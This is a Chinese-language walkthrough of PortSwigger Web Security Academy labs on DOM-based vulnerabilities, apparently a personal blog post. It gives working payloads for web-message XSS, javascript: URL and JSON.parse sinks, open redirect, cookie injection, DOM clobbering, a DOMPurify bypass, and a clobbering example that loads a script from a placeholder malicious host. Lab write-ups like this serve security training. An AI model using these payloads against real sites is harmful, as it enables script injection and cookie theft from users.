Portswigger web security academy:DOM-based vulnerabilities
DOM-based vulnerabilities
材料里没列完,直接做题吧
1 - DOM XSS using web messages
题目描述
- 这个lab有一个简单的web-message漏洞
要求
- 利用exploit server给网站发送一个信息,使其执行
alert(document.cookie)
- 利用exploit server给网站发送一个信息,使其执行
解题过程
查看源码,发现如下代码
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
去MDN看了下web message,是一个跨源通信的函数,可以通过
iframe来实现这个功能构造exp
- 先尝试了用
iframe+script标签的形式,但是发现script标签不会等iframe加载完,所以放进了iframe中 postMessage()的第二个参数使用通配符,允许目标站点为任意域(防止CORS被阻止)- 关于post进去的数据也进行了尝试(chrome),
svg,script都不行,想了一下应该与标签的解析流有关(插入的标签没有被解析),这里用img
<iframe src="https://ac131fb91f0c536f80f50dc100070028.web-security-academy.net/" onload='this.contentWindow.postMessage("<img src=x onerror=alert(document.cookie)>","*")'>
- 先尝试了用
2 - DOM XSS using web messages and a JavaScript URL
题目描述
- 此lab存在DOM-based跳转漏洞(通过web message诱发)
要求
- 构造页面,使访问者执行
alert(document.cookie)
- 构造页面,使访问者执行
解题过程
还是先找代码
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) { //传入的url包含http(s):
location.href = url;// 跳转
}
}, false);
弹窗可以通过伪
javascript伪协议调用let url = 'javscript:alert()-"http:"';
location.href = url; // 但是这样不好写进去,因为单双引号(所以需要借助编码环境进行编码,事件内部是js解析环境,会先进行unicode解码,所以可以进行编码
this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")
构造exp
<iframe src="https://ac901fa21ee08d748031385e00110021.web-security-academy.net/" onload='this.contentWindow.postMessage('javascript:alert(document.cookie)-"http:"',"*")'>
3 - DOM XSS using web messages and JSON.parse
题目描述
- 此lab使用了
web messageing并把消息当作json解析
- 此lab使用了
要求
- 构造页面,使访问者执行
alert(document.cookie)
- 构造页面,使访问者执行
解题过程
先看代码
window.addEventListener('message', function(e) {
var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
document.body.appendChild(iframe);
try {
d = JSON.parse(e.data);
} catch(e) {
return;
}
switch(d.type) {
case "page-load":
ACMEplayer.element.scrollIntoView();
break;
case "load-channel":
ACMEplayer.element.src = d.url; // 如果d.type=="load-channel",则讲url赋给iframe
break;
case "player-height-changed":
ACMEplayer.element.style.width = d.width + "px";
ACMEplayer.element.style.height = d.height + "px";
break;
}
}, false);
构造exp
<iframe src="https://ac0b1f8a1e418d0a802e3c2100ea005f.web-security-academy.net/" onload='var a={"type":"load-channel","url":"javascript:alert(document.cookie)"};this.contentWindow.postMessage(JSON.stringify(a),"*")'>
- 这里需要用
JSON.stringify()把json转换成字符串,不能直接传输对象
- 这里需要用
4 - DOM-based open redirection
题目描述
- 此lab有一个DOM型的url跳转漏洞
要求
- 把受害者拐进exploit server
解题过程
点进一个详情页面,发现返回链接比较特殊
<a href="#" onclick="returnUrl = /url=(https?:\/\/.+)/.exec(location); if(returnUrl)location.href = returnUrl[1];else location.href = '/';">Back to Blog</a>
- 把
location(地址栏里全部的东西,包括#后面的内容)用正则url=(https?:\/\/.+)匹配,如果能匹配到,就跳转到匹配到的url
- 把
构造exp
- 这块想了半天,把受害者拐进exploit server需要点击按钮,总不能继续xss吧,然后去看了solution,自己就是受害者???
- 第二个,使用
#也可以达到目的,但是不给过,只能用&(猜测后端通过检测url参数判断)
https://ac891f911e4e7dcb80201fd4009d0060.web-security-academy.net/post?postId=4#url=https://acc61fdf1e577d2480831f0b019e002b.web-security-academy.net solution: # -> &
5 - DOM-based cookie manipulation
题目描述
- 此lab存在DOM型客户端cookie修改
要求
- 插入一个可以实现XSS(弹cookie)的cookie
解题过程
在商品详情页面看到如下代码
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
可以通过
&/#插入内容在主页,发现在访问过之后,会出现浏览记录,而且会被
'逃逸<a href="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#" -alert()-'="">'>Last viewed product</a> 之前访问的是https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'-alert()-'>
构造exp
<iframe src="https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/product?productId=1#'%3E%3Csvg/onload=alert(document.cookie)%3E" onload="this.src='https://aca21f141f41e76480123c5f005500d9.web-security-academy.net/'">
6 - Exploiting DOM clobbering to enable XSS
题目描述
- 评论功能点允许安全的HTML
要求
- 构造HTML注入,污染(clobber)变量?,调用
alert() - hint:预期解只在chrome有效
- 构造HTML注入,污染(clobber)变量?,调用
解题过程
在详情页面看到函数调用
loadComments('/post/comment'),看看函数定义function loadComments(postCommentPath) {
let xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
let comments = JSON.parse(this.responseText);
displayComments(comments);
}
};
xhr.open("GET", postCommentPath + window.location.search);
xhr.send(); function escapeHTML(data) {
return data.replace(/[<>'"]/g, function(c){
return '&#' + c.charCodeAt(0) + ';';
})
} function displayComments(comments) {
let userComments = document.getElementById("user-comments"); for (let i = 0; i < comments.length; ++i)
{
comment = comments[i];
let commentSection = document.createElement("section");
commentSection.setAttribute("class", "comment"); let firstPElement = document.createElement("p"); let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">'; let divImgContainer = document.createElement("div");
divImgContainer.innerHTML = avatarImgHTML if (comment.author) {
if (comment.website) {
let websiteElement = document.createElement("a");
websiteElement.setAttribute("id", "author");
websiteElement.setAttribute("href", comment.website);
firstPElement.appendChild(websiteElement)
} let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
firstPElement.innerHTML = newInnerHtml
} if (comment.date) {
let dateObj = new Date(comment.date)
let month = '' + (dateObj.getMonth() + 1);
let day = '' + dateObj.getDate();
let year = dateObj.getFullYear(); if (month.length < 2)
month = '0' + month;
if (day.length < 2)
day = '0' + day; dateStr = [day, month, year].join('-'); let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
firstPElement.innerHTML = newInnerHtml
} firstPElement.appendChild(divImgContainer); commentSection.appendChild(firstPElement); if (comment.body) {
let commentBodyPElement = document.createElement("p");
commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body); commentSection.appendChild(commentBodyPElement);
}
commentSection.appendChild(document.createElement("p")); userComments.appendChild(commentSection);
}
}
};
挨着看了一遍,感觉29、30行可能存在问题,但是不知道怎么利用
- 试了一下在提交参数的时候增加
avatar,没有用
- 试了一下在提交参数的时候增加
放着先测一下能用哪些标签
a
audio
b
big
br
button
canvas
center
cite
code
datalist
dfn
del
details
filedset
h1
hr
i
input
ins
kdb
label
li
mark
marquee
meter
optgroup
progress
q
rp
s
samp
select
svg
textarea
u
有点多,挑一个最喜欢的svg测测
然后发现,返回的数据包是没有过滤的,过滤全部在前端的
DOMPurify.sanitize()中进行本以为这条路走不通了,然后在搜这个函数的时候看到一篇Bypass DOMPurify的文章
<form>
<math><mtext>
</form><form>
<mglyph>
<style></math><img src onerror=alert(1)>
回到代码看看
如果能找到给
windows.属性赋值的方法(通过html或请求),就可以通过以下代码进行XSSlet defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';
去看了下材料DOM clobber 里面介绍了一种方法,
<script>
window.onload = function(){
let someObject = window.someObject || {};
let script = document.createElement('script');
script.src = someObject.url;
document.body.appendChild(script);
};
</script>
<!--
To exploit this vulnerable code, you could inject the following HTML to clobber the someObject reference with an anchor element:
As the two anchors use the same ID, the DOM groups them together in a DOM collection. The DOM clobbering vector then overwrites the someObject reference with this DOM collection. A name attribute is used on the last anchor element in order to clobber the url property of the someObject object, which points to an external script.
--> <!-- 要修改 window.someObject.url 则使id=someObject name=url href=目标内容 -->
<a id=someObject><a id=someObject name=url href=//malicious-website.com/malicious.js>
测试发现
javascript:伪协议被过滤试试能不能逃逸出字符串,最后还是看了solution,用的
"("的html实体编码)
构造exp(调用
alert()函数就行了,加document.cookie会被过滤<a id=defaultAvatar><a id=defaultAvatar name=avatar href=""onerror=alert()//">
7 - Clobbering DOM attributes to bypass HTML filters
题目描述
- 此lab使用了
HTMLJanitor库,可以通过DOM clobber构造攻击向量bypass过滤器并调用alert(document.cookie)
- 此lab使用了
要求
- 给受害者发送一个自动执行的攻击向量,
alert(document.cookie) - intended solution for chrome
- 给受害者发送一个自动执行的攻击向量,
解题过程
进详情页面看了看代码,没有上一题的直接引用
window.object/document.object,此外,引用了HTMLJanitor库反复看了几遍
HTMLJanitor的代码,没找到突破口在哪里,于是去看了solution + Donx发现的DOM clobber的介绍<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>
<!-- 覆盖 使 x.attributes == undefined --> <iframe src=https://your-lab-id.web-security-academy.net/post?postId=3 onload="setTimeout(someArgument=>this.src=this.src+'#x',500)">
关键代码
for (var a = 0; a < node.attributes.length; a += 1) {
var attr = node.attributes[a]; if (shouldRejectAttr(attr, allowedAttrs, node)) {
node.removeAttribute(attr.name);
// Shift the array to continue looping.
a = a - 1;
}
} // Sanitize children
this._sanitize(document, node); function shouldRejectAttr(attr, allowedAttrs, node) {
var attrName = attr.name.toLowerCase(); if (allowedAttrs === true) {
return false;
} else if (typeof allowedAttrs[attrName] === "function") {
return !allowedAttrs[attrName](attr.value, node);
} else if (typeof allowedAttrs[attrName] === "undefined") {
return true;
} else if (allowedAttrs[attrName] === false) {
return true;
} else if (typeof allowedAttrs[attrName] === "string") {
return allowedAttrs[attrName] !== attr.value;
} return false;
}
使用
<form id=x tabindex=0 onfocus=alert(document.cookie)><input id=attributes>进行DOM clobber,使得form.attributes == undefined在检测的代码中可以看到,当
node.attributes == undefined时,会绕过removeAttribute(),保留下标签中的事件
之后的
iframe标签是用来触发onfocus的,必须等到加载评论的ajax结束
Portswigger web security academy:DOM-based vulnerabilities的更多相关文章
- Portswigger web security academy:DOM Based XSS
Portswigger web security academy:DOM Based XSS 目录 Portswigger web security academy:DOM Based XSS DOM ...
- Portswigger web security academy:Clickjacking (UI redressing)
Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...
- Portswigger web security academy:WebSockets
Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...
- Portswigger web security academy:Stored XSS
Portswigger web security academy:Stored XSS 目录 Portswigger web security academy:Stored XSS Stored XS ...
- Portswigger web security academy:Cross-origin resource sharing (CORS)
Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...
- Portswigger web security academy:XML external entity (XXE) injection
Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...
- Portswigger web security academy:Cross-site request forgery (CSRF)
Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...
- Portswigger web security academy:OAth authentication vulnerable
Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...
- Portswigger web security academy:Server-side request forgery (SSRF)
Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...
- Portswigger web security academy:OS command injection
Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...
随机推荐
- IDEA的下载、安装与破解
IDEA的下载.安装与破解 下载地址:https://www.jetbrains.com/idea/download/#section=windows 建议下载2018.2版本,方便破解 安装 一直下 ...
- 敏捷史话(九):用做面包的方式做敏捷——Alistair Cockburn
在一次用例和敏捷技术交流大会上,Alistair给大家分享了自己比较崇尚的三个字: "守""破""离",他用做面包的例子,形象地将这三个字与 ...
- 关于主机不能访问虚拟机的web服务解决
centos7默认并没有开启80端口,我们只有开启就行 [root@localhost sysconfig]# firewall-cmd --permanent --add-port=3032/tcp ...
- AbstractQueuedSynchronizer之AQS
一.可重入锁 可参考:可重入锁和递归锁 1,定义 指的是同一线程外层函数获得锁后,再进入该线程的内层方法会自动获取锁(前提:锁对象是同一个对象). Java中的ReentranLock(显示锁)和Sy ...
- JVM之对象回收
finalize /** *此代码演示了两点: *1.对象可以在被GC时自我拯救. *2.这种自救的机会只有一次,因为一个对象的finalize()方法最多只会被系统自动调用一次 */ public ...
- IaaS, PaaS和SaaS的区别
从小型企业到全球企业,云都是一个非常热门的话题,它是一个非常广泛的概念,涵盖了很多在线领域. 无论是应用程序还是基础架构部署,当您开始考虑将业务转移到云时,了解各种云服务的差异和优势比以往任何时候都更 ...
- PTA 求二叉树的深度
6-7 求二叉树的深度 (6 分) 本题要求实现一个函数,可返回二叉树的深度. 函数接口定义: int Depth(BiTree T); T是二叉树树根指针,函数Depth返回二叉树的深度,若树为 ...
- 创建Maven父子项目以及它们的优点
此文引用:https://blog.csdn.net/zxl8876/article/details/104180133 创建maven父子项目 第一步创建父项目: 新建一个普通的maven项目 删除 ...
- 小白的第一次sql实战
去年发的有一篇sql注入忘记粘贴过来了,今天想起了就fuzz过来一下 有id尝试sql注入 找这种sql注入的站用sql检索就行了,但是最好挂代理用谷歌搜索,百度的话搜sql注入的很多被别人打过了,导 ...
- kong 结合 istio demo